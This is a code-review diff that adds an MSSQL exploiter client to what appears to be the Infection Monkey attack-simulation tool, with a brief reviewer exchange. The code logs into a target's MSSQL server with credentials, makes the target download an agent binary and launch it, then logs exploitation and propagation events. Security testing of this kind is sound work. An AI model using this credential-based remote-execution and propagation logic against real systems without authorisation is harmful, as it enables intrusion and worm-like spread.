monkey/agent_plugins/exploiters/mssql/src/mssql_exploit_client.py

```diff
@@ -0,0 +1,151 @@
+        """
+        exploitation_message = ""
+        exploitation_success = True
+
+        # TODO: Try all configured ports?
+        # TODO: Roll download & run into a single command?
+        timestamp = time()
+        try:
+            self._client.login(host.ip, 1433, credentials)
+        except Exception as err:
+            exploitation_message = f"Failed to login to MSSQL server on {host.ip}: {err}"
+            exploitation_success = False
+            pass
+
+        # Propagate
+        propagation_success, propagation_message = self._propagate(
+            download_agent_command,
+            launch_agent_command,
+            exploitation_success,
+            agent_binary_downloaded,
+            options.agent_binary_download_timeout,
+        )
+
+        self._publish_exploitation_event(
+            host, timestamp, exploitation_success, exploitation_message
+        )
+        self._publish_propagation_event(host, timestamp, propagation_success, propagation_message)
+
+        return exploitation_success, propagation_success
+
+    def _propagate(
+        self,
+        download_agent_command: str,
+        launch_agent_command: str,
+        exploitation_success: bool,
+        agent_binary_downloaded: Event,
+        agent_binary_download_timeout: float,
+    ) -> Tuple[bool, str]:
+        if not exploitation_success:
+            return False, ""
+
+        try:
+            self._client.run_command(download_agent_command)
+
+            logger.debug("Waiting for the target to download the agent binary...")
+            agent_binary_downloaded.wait(agent_binary_download_timeout)
+            if agent_binary_downloaded.is_set():
+                self._client.run_command(launch_agent_command)
+                return True, ""
+            else:
+                return False, "Agent binary download timed out"
+        except Exception as err:
+            return False, f"{err}"
+
+    def _publish_exploitation_event(
+        self, host: TargetHost, timestamp: float, success: bool, message: str
+    ):
+        self._agent_event_publisher.publish(
+            ExploitationEvent(
+                source=self._agent_id,
+                target=host.ip,
+                timestamp=timestamp,
+                tags=frozenset(EXPLOITATION_TAGS),
+                success=success,
+                exploiter_name=self._exploiter_name,
+                error_message=message,
+            )
+        )
+
+    def _publish_propagation_event(
+        self, host: TargetHost, timestamp: float, success: bool, message: str
+    ):
+        self._agent_event_publisher.publish(
+            PropagationEvent(
+                source=self._agent_id,
+                target=host.ip,
+                timestamp=timestamp,
+                tags=frozenset(PROPAGATION_TAGS),
+                success=success,
+                exploiter_name=self._exploiter_name,
+                error_message=message,
+            )
+        )
```

Comment:
Not in this PR, but these could be moved to exploit tools as well.

Reply:
Probably for #3314 .